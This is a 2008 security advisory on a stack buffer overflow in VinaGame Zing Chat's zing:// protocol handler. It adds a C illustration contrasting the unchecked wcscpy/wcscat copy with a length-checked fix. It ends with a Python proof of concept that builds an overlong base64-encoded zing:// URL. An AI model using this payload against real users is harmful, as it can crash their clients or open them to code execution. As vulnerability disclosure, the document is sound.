BLUE MOON SECURITY ADVISORY 2008-03

Title: Buffer overflow in VinaGame Zing Chat
Severity: Moderate
Reporter: Blue Moon Consulting
Products: VinaGame Zing Chat 1.1.3
Fixed in: --

Description

VinaGame Zing Chat contains a buffer overflow in its PPFTCtrl module that may allow an attacker to run arbitrary code. At the very least, an attacker can crash Zing Chat.

When parsing the zing://RegisterPPDownLoadFileFunc protocol handler, the input values are not length-checked. They are later copied with wcscpy() and wcscat() into fixed-size local buffers, resulting in stack buffer overflows.

The overflow overwrites the saved return address and would hand the attacker control of execution flow if not for the stack-smashing protection built into the compiler. An attacker who manages to predict the canary value bypasses this protection, although the chance of doing so is slim.
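The unchecked copy pattern described above, beside a length-checked replacement, as an added illustration and not code from Zing Chat or PPFTCtrl. The 260-element buffer size, the directory prefix C:\Downloads and all function names are assumptions made for the example; the only facts taken from this advisory are the wcscpy()/wcscat() sequence and the 4000-character filename carried in the exploit URL.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <wchar.h>

/* Size of the local buffer the handler copies into. ASSUMPTION: the advisory
   does not state the real buffer size in PPFTCtrl; MAX_PATH (260) is used here. */
#define PATH_BUF_LEN 260

/* Length of the filename the advisory's exploit URL carries ('a' * 4000). */
#define EXPLOIT_NAME_LEN 4000

/* Number of wchar_t the unchecked wcscpy/wcscat sequence writes:
   dir + L"\\" + filename + terminating NUL. */
size_t unchecked_chars_written(const wchar_t *dir, const wchar_t *filename)
{
    return wcslen(dir) + 1 + wcslen(filename) + 1;
}

/* True when the unchecked sequence would run past a PATH_BUF_LEN buffer and
   start overwriting whatever sits above it on the stack (saved return address,
   or the canary in front of it). */
bool would_smash_buffer(const wchar_t *dir, const wchar_t *filename)
{
    return unchecked_chars_written(dir, filename) > PATH_BUF_LEN;
}

/* The pattern the advisory describes: values lifted from the zing:// payload are
   wcscpy'd/wcscat'd into a fixed-size local buffer with no length check.
   Never call this with untrusted input; it is here only to contrast with the fix. */
void build_path_unchecked(wchar_t out[PATH_BUF_LEN], const wchar_t *dir, const wchar_t *filename)
{
    wcscpy(out, dir);       /* overflow if dir alone exceeds the buffer */
    wcscat(out, L"\\");
    wcscat(out, filename);  /* a 4000-char filename overruns 260 wchar_t by a wide margin */
}

/* Hardened form: measure first, refuse anything that does not fit, then copy
   with explicit bounds. Returns false (and an empty buffer) on oversized input. */
bool build_path_checked(wchar_t *out, size_t out_len, const wchar_t *dir, const wchar_t *filename)
{
    if (out == NULL || out_len == 0)
        return false;
    out[0] = L'\0';

    size_t dir_len = wcslen(dir);
    if (dir_len + 1 >= out_len)             /* no room for dir + separator + NUL */
        return false;
    size_t room = out_len - dir_len - 2;    /* wchar_t left for the filename */
    size_t file_len = wcslen(filename);
    if (file_len > room)                    /* this is the check PPFTCtrl lacks */
        return false;

    wmemcpy(out, dir, dir_len);
    out[dir_len] = L'\\';
    wmemcpy(out + dir_len + 1, filename, file_len);
    out[dir_len + 1 + file_len] = L'\0';
    return true;
}

/* Feed the exploit-sized filename to the hardened builder. Returns 1 when the
   unchecked sequence would have overrun the buffer and the checked one refused it. */
int exploit_name_is_rejected(void)
{
    static wchar_t name[EXPLOIT_NAME_LEN + 1];
    wchar_t out[PATH_BUF_LEN];
    wmemset(name, L'a', EXPLOIT_NAME_LEN);
    name[EXPLOIT_NAME_LEN] = L'\0';

    bool smashes = would_smash_buffer(L"C:\\Downloads", name);
    bool accepted = build_path_checked(out, PATH_BUF_LEN, L"C:\\Downloads", name);
    return (smashes && !accepted) ? 1 : 0;
}

/* Feed the benign filename from the advisory's payload. Returns 1 when it is
   accepted and the assembled path is the expected one. */
int benign_name_is_accepted(void)
{
    wchar_t out[PATH_BUF_LEN];
    bool ok = build_path_checked(out, PATH_BUF_LEN, L"C:\\Downloads", L"barnyard.avi");
    return (ok && wcscmp(out, L"C:\\Downloads\\barnyard.avi") == 0) ? 1 : 0;
}

int main(void)
{
    printf("exploit-sized filename rejected: %d\n", exploit_name_is_rejected());
    printf("benign filename accepted:        %d\n", benign_name_is_accepted());
    return 0;
}
```

The checked builder measures the three pieces before writing anything and fails closed, so the 4000-character filename is refused outright instead of reaching the stack; the compiler's canary then never has to catch it, which matters because the canary only turns the overwrite into a crash rather than preventing it.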

Workaround

Do not click on any link that starts with zing://.

Fix

There is no fix at the moment. Customers are advised to contact the vendor directly for a proper fix.

Disclosure

Blue Moon Consulting follows RFPolicy v2.0 when notifying vendors.

Initial vendor contact:
 May 08, 2008: alert sent via web form, auto-reply received from zingportal_info@vinagame.vn
Vendor response:
 --
Public disclosure:
 May 15, 2008
Exploit code:
 The following Python 3 snippet generates an overly long zing:// URL:

import base64

# Job descriptor the URL carries in its "content" parameter, base64-encoded.
# tribename is "Thế Giới Phim"; it is UTF-8 encoded below before base64.
a = '<fdctt ver="1" jobid="C55F718A-3206-4A98-AA42-15B36054F010" tribeid="21569327264368" tribename="Thế Giới Phim" toolid="{4588C3CB-972A-43d5-A78E-E1BEE00E9E3E}" fileid="{268DCE6E-8406-65D6-F22B-15A876123862}" filename="barnyard.avi" tracker="Tracker.chat.zing.vn" comid="1"/>'

# Replace the filename with 4000 'a' characters, then base64-encode without line breaks.
b = base64.b64encode(a.replace("barnyard.avi", "a" * 4000).encode("utf-8")).decode("ascii")

print("zing://RegisterPPDownLoadFileFunc/?content=%s" % b)

Disclaimer

The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.